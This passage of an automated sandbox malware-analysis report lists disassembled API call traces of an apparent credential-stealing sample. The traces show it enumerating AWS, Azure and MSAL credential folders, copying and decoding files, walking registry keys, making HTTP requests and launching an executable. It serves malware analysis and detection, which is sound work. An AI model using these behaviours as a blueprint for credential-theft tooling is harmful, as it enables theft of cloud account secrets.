                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        • memset.MSVCRT ref: 00414E9F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02EBB138,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                        • memset.MSVCRT ref: 00414F2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                        • API String ID: 4017274736-156832076
                                                        • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                        • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                        • lstrcatA.KERNEL32(?,00000000,02EB5E08,00421474,02EB5E08,00421470,00000000), ref: 0040D208
                                                        • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                        • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                        • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                        • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                        • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                        • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                        • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                        • lstrlenA.KERNEL32(?), ref: 0040D339
                                                        • memset.MSVCRT ref: 0040D388
                                                          • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 2775534915-0
                                                        • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                        • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02CFD1EA
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02CFD32E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CFD335
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD46F
                                                        • lstrcat.KERNEL32(?,00421478), ref: 02CFD47E
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD491
                                                        • lstrcat.KERNEL32(?,0042147C), ref: 02CFD4A0
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD4B3
                                                        • lstrcat.KERNEL32(?,00421480), ref: 02CFD4C2
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD4D5
                                                        • lstrcat.KERNEL32(?,00421484), ref: 02CFD4E4
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD4F7
                                                        • lstrcat.KERNEL32(?,00421488), ref: 02CFD506
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD519
                                                        • lstrcat.KERNEL32(?,0042148C), ref: 02CFD528
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CFD53B
                                                        • lstrcat.KERNEL32(?,00421490), ref: 02CFD54A
                                                          • Part of subcall function 02D0AA87: lstrlen.KERNEL32(02CF516C,?,?,02CF516C,00420DDE), ref: 02D0AA92
                                                          • Part of subcall function 02D0AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D0AAEC
                                                        • lstrlen.KERNEL32(?), ref: 02CFD591
                                                        • lstrlen.KERNEL32(?), ref: 02CFD5A0
                                                        • memset.MSVCRT ref: 02CFD5EF
                                                          • Part of subcall function 02D0ACD7: StrCmpCA.SHLWAPI(0064A350,02CFAA0E,?,02CFAA0E,0064A350), ref: 02D0ACF6
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CFD61B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 1973479514-0
                                                        • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction ID: 6f3ef1016866a4e6aa612250cc3fd0d10716fa0ce84af069bceee1a0175356e5
                                                        • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction Fuzzy Hash: 6EE11B75950218ABCB08FBE0DD95EEE737AEF24305F504159E206A62E0DE35AE09CF71
                                                        APIs
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A51
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A68
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A7F
                                                          • Part of subcall function 02CF4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02CF4AA0
                                                          • Part of subcall function 02CF4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02CF4AB0
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02CF5C5F
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 02CF5C7A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02CF5DFA
                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 02CF60D8
                                                        • lstrlen.KERNEL32(00000000), ref: 02CF60E9
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 02CF60FA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CF6101
                                                        • lstrlen.KERNEL32(00000000), ref: 02CF6116
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 02CF612D
                                                        • lstrlen.KERNEL32(00000000), ref: 02CF613F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02CF6158
                                                        • memcpy.MSVCRT(?), ref: 02CF6165
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 02CF6182
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02CF6196
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02CF61B3
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF6217
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF6224
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02CF5E5F
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF622E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                        • String ID:
                                                        • API String ID: 1703137719-0
                                                        • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction ID: eec4e876b254d5385ced17b4ecfe38f42a6e7410f88e5e25e0bb1032307d3122
                                                        • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction Fuzzy Hash: 3B12BD75950228ABCB15EBA0DD94FEEB37AFF54704F504199A206621E0EF702F89CF64
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02EB9B30,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                        • StrStrA.SHLWAPI(?,02EB9B48,00420B52), ref: 0040CAF7
                                                        • StrStrA.SHLWAPI(00000000,02EB9B60), ref: 0040CB1E
                                                        • StrStrA.SHLWAPI(?,02EBA5C8,00000000,?,00421458,00000000,?,00000000,00000000,?,02EB5DB8,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                        • StrStrA.SHLWAPI(00000000,02EBA408), ref: 0040CCB9
                                                          • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                          • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB5CB8), ref: 0040C871
                                                          • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                          • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • StrStrA.SHLWAPI(?,02EBA408,00000000,?,0042145C,00000000,?,00000000,02EB5CB8), ref: 0040CD5A
                                                        • StrStrA.SHLWAPI(00000000,02EB6028), ref: 0040CD71
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                        • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 02CFCCD3
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02CFCCF0
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 02CFCCFC
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02CFCD0F
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 02CFCD1C
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02CFCD40
                                                        • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 02CFCD5E
                                                        • StrStrA.SHLWAPI(00000000,0064A364), ref: 02CFCD85
                                                        • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 02CFCF09
                                                        • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 02CFCF20
                                                          • Part of subcall function 02CFCA87: memset.MSVCRT ref: 02CFCABA
                                                          • Part of subcall function 02CFCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02CFCAD8
                                                          • Part of subcall function 02CFCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02CFCAE3
                                                          • Part of subcall function 02CFCA87: memcpy.MSVCRT(?,?,?), ref: 02CFCB79
                                                        • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 02CFCFC1
                                                        • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 02CFCFD8
                                                          • Part of subcall function 02CFCA87: lstrcat.KERNEL32(?,00420B46), ref: 02CFCBAA
                                                          • Part of subcall function 02CFCA87: lstrcat.KERNEL32(?,00420B47), ref: 02CFCBBE
                                                          • Part of subcall function 02CFCA87: lstrcat.KERNEL32(?,00420B4E), ref: 02CFCBDF
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFD0AB
                                                        • CloseHandle.KERNEL32(00000000), ref: 02CFD103
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction ID: d0f1e4373049222a9156ccacc330456fbafaad4d115ca490895411f054349c1c
                                                        • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction Fuzzy Hash: 84E1DD76900218ABCB14EBA4DD94FEEB77AEF14304F404159E206A72E0DF346E89CF61
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • RegOpenKeyExA.ADVAPI32(00000000,02EB7B28,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                        • String ID: - $%s\%s$?
                                                        • API String ID: 3246050789-3278919252
                                                        • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                        • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memset.MSVCRT ref: 00410C1C
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                        • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                        • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                        • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                        • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                        • memset.MSVCRT ref: 00410CCD
                                                        • memset.MSVCRT ref: 00410CE1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID: .exe
                                                        • API String ID: 1395395982-4119554291
